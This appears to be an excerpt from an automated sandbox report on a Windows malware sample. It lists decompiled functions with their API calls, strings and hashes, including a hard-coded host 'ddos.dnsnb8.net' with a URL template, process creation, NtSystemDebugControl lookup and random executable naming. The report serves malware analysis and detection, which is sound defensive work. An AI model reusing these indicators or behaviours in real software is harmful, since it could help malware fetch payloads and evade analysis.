                              • Opcode Fuzzy Hash: 028957f4c95032e802e353f1906c966e7bba826a4dfd5831b256846def512dcb
                              • Instruction Fuzzy Hash: 7C21F031645321EBD7329B64EC08FABBAACFB95B00F014D1CF646E6280C774DA41CBA5
                              Function 0032189D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51processsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 003218B1
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 003218D3
                              • CloseHandle.KERNEL32(I%2), ref: 003218E9
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003218F0
                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00321901
                              • CloseHandle.KERNEL32(?), ref: 0032190A
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                              • String ID: I%2
                              • API String ID: 876959470-2687430202
                              • Opcode ID: 0f44fa39909146e34870787e8dff9cf4e3c0039d2505766a1d5da7650fa8e686
                              • Instruction ID: 3484249f95b287d070ab3caca2f2b5f7b9c47b56030d2c41f54008806c128a28
                              • Opcode Fuzzy Hash: 0f44fa39909146e34870787e8dff9cf4e3c0039d2505766a1d5da7650fa8e686
                              • Instruction Fuzzy Hash: 85017172901128BBCB226B95EC48DDF7F3DFF85730F104025F916A51A0D6354A59CAA0
                              Function 0032185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,76938400,http://%s:%d/%s/%s,?,?,?,00321118), ref: 00321867
                              • srand.MSVCRT ref: 00321878
                              • rand.MSVCRT ref: 00321880
                              • srand.MSVCRT ref: 00321890
                              • rand.MSVCRT ref: 00321894
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Timerandsrand$FileSystem
                              • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                              • API String ID: 4106363736-3273462101
                              • Opcode ID: 8c053969a0b227cc7842d3410177235bfa8db6958952174166a7e5ccfe775e15
                              • Instruction ID: adae1bb91e573a3141051523db8a0d9f0189fcee7ad4858a571e3f6c7a5307e6
                              • Opcode Fuzzy Hash: 8c053969a0b227cc7842d3410177235bfa8db6958952174166a7e5ccfe775e15
                              • Instruction Fuzzy Hash: 9FE0D877A00218BBD710A7F9FC4689EBBACDF84261F10052BF601D3250E974FD458AB4
                              Function 00322692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,003229DB,?,00000001), ref: 003226A7
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,003229DB,?,00000001), ref: 003226B5
                              • lstrlen.KERNEL32(?), ref: 003226C4
                              • ??2@YAPAXI@Z.MSVCRT ref: 003226CE
                              • lstrcpy.KERNEL32(00000004,?), ref: 003226E3
                              • lstrcpy.KERNEL32(?,00000004), ref: 0032271F
                              • ??3@YAXPAX@Z.MSVCRT ref: 0032272D
                              • SetEvent.KERNEL32 ref: 0032273C
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                              • String ID:
                              • API String ID: 41106472-0
                              • Opcode ID: 41800e4c9f8add10a00b615969736c3923428a10d6804466cc4c2afa688ba53e
                              • Instruction ID: 8ae84c531e4aeca00c518d3973b86aedda089a180a3e4d7d49737f07ef48758f
                              • Opcode Fuzzy Hash: 41800e4c9f8add10a00b615969736c3923428a10d6804466cc4c2afa688ba53e
                              • Instruction Fuzzy Hash: 28115B76504220FFCB339F19FC4885B7BADFB84721B16802DF8599B121D7749986DBA0
                              Function 00321B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              • .exe, xrefs: 00321C57
                              • ytqjAADLeHYQQDpcrJmravUWfuEVBuCjZaZeJkrLXfKlXIOksHdoKhnMyymsYFnCBRqeGtPZFwphgNmYWciSgRtHdwOlLSfNxSCsEkPIGTwqUpzMiuoRlvKbVQbXOaxJPioDhcnxjVNgTzEbTzUFdGAMIvBW, xrefs: 00321B8A, 00321B9C, 00321C15, 00321C49
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: lstrcatmemcpymemsetrandsrand
                              • String ID: .exe$ytqjAADLeHYQQDpcrJmravUWfuEVBuCjZaZeJkrLXfKlXIOksHdoKhnMyymsYFnCBRqeGtPZFwphgNmYWciSgRtHdwOlLSfNxSCsEkPIGTwqUpzMiuoRlvKbVQbXOaxJPioDhcnxjVNgTzEbTzUFdGAMIvBW
                              • API String ID: 122620767-2686580828
                              • Opcode ID: 5d81c1e5bf6bd1c16f9c645c294c3885ac4568df7431c9b5d26cb763353d742a
                              • Instruction ID: 1a5682500477a0dbc9931a426ad8d1518a5832c33072594163ddc8eb9dbcdf23
                              • Opcode Fuzzy Hash: 5d81c1e5bf6bd1c16f9c645c294c3885ac4568df7431c9b5d26cb763353d742a
                              • Instruction Fuzzy Hash: AC215E32E842B06EE33713397D90BAA3F588FB3721F17409DF9851B193D268098783A4
                              Function 00321319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00321334
                              • GetProcAddress.KERNEL32(00000000), ref: 0032133B
                              • memset.MSVCRT ref: 00321359
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProcmemset
                              • String ID: NtSystemDebugControl$ntdll.dll
                              • API String ID: 3137504439-2438149413
                              • Opcode ID: af02a00857f0b0a2a600ae40bf1e5c5e61aa691b649396bd0e7b43884ba380c5
                              • Instruction ID: 8981da24d4c7ef6053f64b0ede1ca39bc9fb2067215739e0839eb778d61e0e9d
                              • Opcode Fuzzy Hash: af02a00857f0b0a2a600ae40bf1e5c5e61aa691b649396bd0e7b43884ba380c5
                              • Instruction Fuzzy Hash: 53018075A0032DBFDB22DF94FD859AFBBADFB51314F00452AFA01A2140E3749655CA51
                              Function 00321DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: strrchr$lstrcmpilstrcpylstrlen
                              • String ID:
                              • API String ID: 3636361484-0
                              • Opcode ID: e0c04ae3e6705ae065ec9c2a1441b07fd5dc7edd5bca3f541b0ff7adac20adae
                              • Instruction ID: 3594e0387f49b448ea65b82e8c15ebd67ba01cff29f35edf3e0aaeeda47e60b0
                              • Opcode Fuzzy Hash: e0c04ae3e6705ae065ec9c2a1441b07fd5dc7edd5bca3f541b0ff7adac20adae
                              • Instruction Fuzzy Hash: 3E01F9B29142696FEB325B60FD48FD677DCDB14310F06406AEA46E3090EA749A858BA4
                              Function 00326014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0032603C
                              • GetProcAddress.KERNEL32(00000000,00326064), ref: 0032604F
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.2235835027.0000000000326000.00000040.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                              • Associated: 00000002.00000002.2235745040.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235766696.0000000000321000.00000020.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000002.00000002.2235813937.0000000000324000.00000004.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_320000_jawuwAtX.jbxd
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: kernel32.dll
                              • API String ID: 1646373207-1793498882
                              • Opcode ID: 0420f9334c45194695e7ffbd4d26ac948a58e5d951b1847e77c8fb1bbedb689e
                              • Instruction ID: f9c0a1d7f868a625255c0ded8df58830b1d0749b8ed1a6b6c7c42990410b8c06
                              • Opcode Fuzzy Hash: 0420f9334c45194695e7ffbd4d26ac948a58e5d951b1847e77c8fb1bbedb689e
                              • Instruction Fuzzy Hash: D6F0F0F11442A98FEF718EA4DC45BDE3BE4EF15700F50442AEA0DCB281CB3496059B64